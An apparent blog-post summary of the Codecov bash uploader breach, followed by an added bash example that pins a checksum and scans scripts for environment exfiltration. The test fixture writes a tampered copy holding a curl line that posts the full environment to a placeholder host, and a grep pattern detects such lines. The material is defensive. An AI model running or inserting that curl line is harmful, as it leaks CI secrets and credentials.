Company
Date Published
Author
Dan McKinney
Word count
537
Language
English
Hacker News points
None

Summary

Codecov, a code coverage tool used in CI pipelines, was targeted by malicious actors who inserted malicious code into its bash uploader script, allowing them to scrape environment variables from users' CI jobs and send them to an unknown third party. The intrusion was possible because an error in Codecov's Docker image creation process leaked a credential that allowed the attackers to modify the bash uploader script. The malicious change was a single added line which, whenever the script ran as part of a CI process, sent the contents of the environment to an unknown recipient. Codecov discovered the unauthorized access on April 1st, after a customer noticed a discrepancy between the publicly posted checksum and the checksum they computed from the downloaded script. The incident highlights the importance of provenance and isolation in ensuring software integrity, particularly in Continuous Packaging environments. Affected users are advised to re-roll any credentials, tokens, or keys stored in the environment variables of CI processes that ran the uploader, and to audit where those secrets were used.
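The check the customer in this story performed by hand, as an added example that is not code from the original post, from Cloudsmith or from Codecov: a bash guard that pins the uploader's SHA-256, refuses to execute a copy whose digest has drifted, and additionally rejects any copy containing a line that ships the process environment to a remote host. The fixture scripts, the function names, and the placeholder collector address 192.0.2.10 (a documentation address) are constructed for this example; the tampered line is modeled on the shape the summary describes and is never executed.

```bash
#!/usr/bin/env bash
# Added example (not from the original post, Cloudsmith or Codecov): guard a
# "download and run" uploader with a pinned checksum plus a crude content scan.
# Assumes bash and either sha256sum (coreutils) or shasum (BSD/macOS).

# Print the hex SHA-256 digest of a file.
compute_sha256() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# Return 0 if the file matches the pinned digest, 1 otherwise. The pin is
# meant to come from a checksum fetched out of band and updated deliberately,
# never from the same download as the script itself.
verify_checksum() {
    local file=$1 expected=$2 actual
    actual=$(compute_sha256 "$file")
    [ "$actual" = "$expected" ]
}

# Return 0 if no line both performs a network upload and expands the process
# environment; 1 if such a line is found. Heuristic only: catches the pattern
# the summary describes (env contents handed to curl/wget), not every exfil.
scan_for_env_exfil() {
    ! grep -qE '(curl|wget).*(\$\(env\)|`env`|printenv)' "$1"
}

# Execute the script only when both checks pass. Returns 2 on checksum
# mismatch, 3 on a suspicious line, otherwise the script's own exit status.
run_if_trusted() {
    local file=$1 expected=$2
    verify_checksum "$file" "$expected" || return 2
    scan_for_env_exfil "$file" || return 3
    bash "$file"
}

# Constructed fixtures: a harmless stand-in uploader and a copy with one
# appended line that posts `env` to an outside host (192.0.2.10 is a
# documentation address, not a real collector).
make_fixtures() {
    local dir=$1
    cat >"$dir/good.sh" <<'EOF'
#!/usr/bin/env bash
# Constructed stand-in for a CI uploader script.
echo "uploading coverage report for ${CI_COMMIT:-unknown}"
EOF
    cp "$dir/good.sh" "$dir/tampered.sh"
    cat >>"$dir/tampered.sh" <<'EOF'
curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://192.0.2.10/upload
EOF
}

# Stand-alone demo: pin the known-good script, then try both copies.
demo() {
    local dir pin
    dir=$(mktemp -d)
    make_fixtures "$dir"
    pin=$(compute_sha256 "$dir/good.sh")
    echo "pinned sha256: $pin"
    run_if_trusted "$dir/good.sh" "$pin" && echo "good.sh: ran"
    run_if_trusted "$dir/tampered.sh" "$pin" || echo "tampered.sh: refused (status $?)"
    rm -rf "$dir"
}
demo
```

The order of the checks matters: the checksum is the real control and runs first, so a tampered copy is rejected before its contents are even inspected; the content scan is only a second opinion for the case where the pin itself was refreshed from a compromised source.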